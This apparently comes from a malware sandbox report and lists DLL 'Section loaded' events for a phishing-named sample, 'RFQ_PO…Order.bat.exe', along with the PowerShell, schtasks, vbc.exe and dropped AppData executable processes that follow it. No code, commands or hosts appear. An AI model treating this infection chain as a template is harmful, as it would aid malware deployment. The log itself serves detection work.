                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Section loaded: userenv.dll
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Section loaded: msasn1.dll
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Section loaded: gpapi.dll
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Section loaded: textshaping.dll
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Section loaded: propsys.dll
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Section loaded: edputil.dll
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Section loaded: urlmon.dll
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Section loaded: iertutil.dll
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Section loaded: srvcli.dll
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Section loaded: netutils.dll
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Section loaded: windows.staterepositoryps.dll
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Section loaded: sspicli.dll
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Section loaded: wintypes.dll
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Section loaded: appresolver.dll
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Section loaded: bcp47langs.dll
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Section loaded: slc.dll
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Section loaded: sppc.dll
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Section loaded: onecorecommonproxystub.dll
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Section loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Section loaded: ntmarta.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                  Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
                  Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section loaded: winhttp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section loaded: secur32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section loaded: ntmarta.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section loaded: mscoree.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section loaded: wldp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section loaded: amsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section loaded: userenv.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section loaded: profapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section loaded: msasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section loaded: gpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section loaded: rasapi32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section loaded: rasman.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section loaded: rtutils.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section loaded: mswsock.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section loaded: dhcpcsvc6.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section loaded: dhcpcsvc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section loaded: rasadhlp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section loaded: fwpuclnt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section loaded: schannel.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section loaded: mskeyprotect.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section loaded: ntasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section loaded: ncrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section loaded: ncryptsslp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section loaded: dpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section loaded: webio.dll
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\alg.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\alg.exe | Section loaded: mswsock.dll
                  Source: C:\Windows\System32\alg.exe | Section loaded: winhttp.dll
                  Source: C:\Windows\System32\alg.exe | Section loaded: mpr.dll
                  Source: C:\Windows\System32\alg.exe | Section loaded: secur32.dll
                  Source: C:\Windows\System32\alg.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\System32\alg.exe | Section loaded: dnsapi.dll
                  Source: C:\Windows\System32\alg.exe | Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\alg.exe | Section loaded: ntmarta.dll
                  Source: C:\Windows\System32\alg.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\alg.exe | Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\alg.exe | Section loaded: winnsi.dll
                  Source: C:\Windows\System32\alg.exe | Section loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\alg.exe | Section loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\alg.exe | Section loaded: webio.dll
                  Source: C:\Windows\System32\alg.exe | Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\alg.exe | Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\alg.exe | Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\alg.exe | Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\alg.exe | Section loaded: drprov.dll
                  Source: C:\Windows\System32\alg.exe | Section loaded: winsta.dll
                  Source: C:\Windows\System32\alg.exe | Section loaded: ntlanman.dll
                  Source: C:\Windows\System32\alg.exe | Section loaded: davclnt.dll
                  Source: C:\Windows\System32\alg.exe | Section loaded: davhlpr.dll
                  Source: C:\Windows\System32\alg.exe | Section loaded: wkscli.dll
                  Source: C:\Windows\System32\alg.exe | Section loaded: cscapi.dll
                  Source: C:\Windows\System32\alg.exe | Section loaded: netutils.dll
                  Source: C:\Windows\System32\alg.exe | Section loaded: browcli.dll
                  Source: C:\Windows\System32\alg.exe | Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\AppVClient.exe | Section loaded: appvpolicy.dll
                  Source: C:\Windows\System32\AppVClient.exe | Section loaded: userenv.dll
                  Source: C:\Windows\System32\AppVClient.exe | Section loaded: wtsapi32.dll
                  Source: C:\Windows\System32\AppVClient.exe | Section loaded: netapi32.dll
                  Source: C:\Windows\System32\AppVClient.exe | Section loaded: secur32.dll
                  Source: C:\Windows\System32\AppVClient.exe | Section loaded: wininet.dll
                  Source: C:\Windows\System32\AppVClient.exe | Section loaded: netutils.dll
                  Source: C:\Windows\System32\AppVClient.exe | Section loaded: samcli.dll
                  Source: C:\Windows\System32\AppVClient.exe | Section loaded: logoncli.dll
                  Source: C:\Windows\System32\AppVClient.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\System32\AppVClient.exe | Section loaded: winhttp.dll
                  Source: C:\Windows\System32\AppVClient.exe | Section loaded: mpr.dll
                  Source: C:\Windows\System32\AppVClient.exe | Section loaded: dnsapi.dll
                  Source: C:\Windows\System32\AppVClient.exe | Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\AppVClient.exe | Section loaded: ntmarta.dll
                  Source: C:\Windows\System32\AppVClient.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\AppVClient.exe | Section loaded: appmanagementconfiguration.dll
                  Source: C:\Windows\System32\FXSSVC.exe | Section loaded: version.dll
                  Source: C:\Windows\System32\FXSSVC.exe | Section loaded: tapi32.dll
                  Source: C:\Windows\System32\FXSSVC.exe | Section loaded: credui.dll
                  Source: C:\Windows\System32\FXSSVC.exe | Section loaded: fxstiff.dll
                  Source: C:\Windows\System32\FXSSVC.exe | Section loaded: winhttp.dll
                  Source: C:\Windows\System32\FXSSVC.exe | Section loaded: mpr.dll
                  Source: C:\Windows\System32\FXSSVC.exe | Section loaded: secur32.dll
                  Source: C:\Windows\System32\FXSSVC.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\System32\FXSSVC.exe | Section loaded: dnsapi.dll
                  Source: C:\Windows\System32\FXSSVC.exe | Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\FXSSVC.exe | Section loaded: ntmarta.dll
                  Source: C:\Windows\System32\FXSSVC.exe | Section loaded: slc.dll
                  Source: C:\Windows\System32\FXSSVC.exe | Section loaded: sppc.dll
                  Source: C:\Windows\System32\FXSSVC.exe | Section loaded: fxsresm.dll
                  Source: C:\Windows\System32\FXSSVC.exe | Section loaded: ualapi.dll
                  Source: C:\Windows\System32\FXSSVC.exe | Section loaded: slc.dll
                  Source: C:\Windows\System32\FXSSVC.exe | Section loaded: sppc.dll
                  Source: C:\Windows\System32\FXSSVC.exe | Section loaded: slc.dll
                  Source: C:\Windows\System32\FXSSVC.exe | Section loaded: sppc.dll
                  Source: C:\Windows\System32\FXSSVC.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\FXSSVC.exe | Section loaded: wldp.dll
                  Source: C:\Windows\System32\FXSSVC.exe | Section loaded: profapi.dll
                  Source: C:\Windows\System32\FXSSVC.exe | Section loaded: slc.dll
                  Source: C:\Windows\System32\FXSSVC.exe | Section loaded: sppc.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Section loaded: dbghelp.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Section loaded: winhttp.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Section loaded: mpr.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Section loaded: secur32.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Section loaded: sspicli.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Section loaded: dnsapi.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Section loaded: iphlpapi.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Section loaded: ntmarta.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Section loaded: version.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Section loaded: msasn1.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Section loaded: winhttp.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Section loaded: mpr.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Section loaded: secur32.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Section loaded: sspicli.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Section loaded: dnsapi.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Section loaded: iphlpapi.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Section loaded: ntmarta.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\msdtc.exe | Section loaded: msdtctm.dll
                  Source: C:\Windows\System32\msdtc.exe | Section loaded: msdtcprx.dll
                  Source: C:\Windows\System32\msdtc.exe | Section loaded: msdtclog.dll
                  Source: C:\Windows\System32\msdtc.exe | Section loaded: mtxclu.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: winmm.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: clusapi.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: xolehlp.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: mtxclu.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: ktmw32.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: clusapi.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: resutils.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: clusapi.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: resutils.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: comres.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: msdtcvsp1res.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: mtxoci.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: oci.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: wkscli.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: cscapi.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: firewallapi.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: fwbase.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: fwpolicyiomgr.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: hid.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: dxgi.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: devobj.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: dwrite.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: windowscodecs.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: textshaping.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: edputil.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: appresolver.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: bcp47langs.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: slc.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: sppc.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\System32\Locator.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\Locator.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\Locator.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\Locator.exeSection loaded: sspicli.dll
